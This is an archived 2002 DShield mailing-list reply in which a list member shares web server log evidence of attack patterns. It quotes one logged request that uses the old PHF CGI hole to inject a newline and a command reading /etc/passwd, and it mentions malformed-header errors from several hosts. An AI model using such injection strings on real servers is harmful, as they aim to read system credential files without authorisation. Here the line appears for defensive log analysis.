[Dshield] Re: Unusual log activity - any ideas?

Matthew Palmer dshield at tinfoil.demon.co.uk
Wed May 1 22:51:04 GMT 2002


Hey Preston,

         I've been working on a project examining HTTP logs for a few websites
>and looking at attack patterns. I've noticed something unusual about a few
>of them I found online.

Closest I can find in my log (Grep for passwd) is:

217.81.xxx.xxx - - [11/Apr/2002:20:35:35 +0000] "GET /cgi-bin/phf?Qalias
=%0A/bin/cat%20/etc/passwd HTTP/1.0" 404 205 "-" "-"

Plus a few "Client sent Malformed Header" at around the time/date but 
several different hosts.

TTFN
Matt Palmer.




More information about the list mailing list